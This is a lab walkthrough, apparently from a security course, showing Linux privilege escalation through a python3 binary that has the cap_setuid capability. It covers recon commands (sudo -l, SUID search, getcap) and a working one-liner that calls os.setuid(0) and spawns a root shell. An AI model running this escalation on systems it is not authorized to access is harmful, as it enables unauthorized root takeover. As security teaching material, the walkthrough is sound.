Privesc With Capabilities demo
Our final privesc walk-through is for capabilities
We can find the challenge in /privesc/Demos/Capbility_Demo
Start it using docker-compose (as usual) and connect over SSH.
Initial Recon
Lets go through a more detailed recon process this time around.
- Look for local files
- check sudo rights
- check for suid
- check for capabilities.
Local Files
So we have python locally. But as it only has rights for our unprivileged user, there is nothing obvious here. We log that as unusual, and carry on our recon.
cueh@6f82719676f9:~$ ls -l
total 4748
-rwxr-xr-x 1 cueh cueh 4861504 Feb 8 21:07 python3
Sudo and SUID
Nothing on Sudo or SUID
cueh@e34bd83dcf83:~$ sudo -l
-bash: sudo: command not found
cueh@e34bd83dcf83:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/umount
/bin/ping
/bin/su
Capabilities
We will also do a search for all files with capabilities
cueh@e34bd83dcf83:~$ getcap -r / 2>/dev/null
/home/cueh/python3 = cap_setuid+ep
We can see there that the Python3 binary in our home directory has the CAP_SETUID capability. This means that the process can set or modify the user, when the process is running
This should let us become root if we can get our program to call the system level SETUID call.
Building an exploit
Pythons os module lets us call system level functionality. For example dealing with processes, or the environment.
It will also let us call the setuid() function. This requires root permissions, which we can get through the capabilities.
Our python program that can do this looks something like
import os
os.setuid(0)
os.system('/bin/sh')
We can also do this in a one liner using the -c
flag.
cueh@6f82719676f9:~$ ./python3 -c "import os; os.setuid(0); os.system('/bin/sh')"
# id
uid=0(root) gid=1000(cueh) groups=1000(cueh)
#
Video
Tasks
Easytask
Follow through with the capabilities based walkthrough, and get the flag.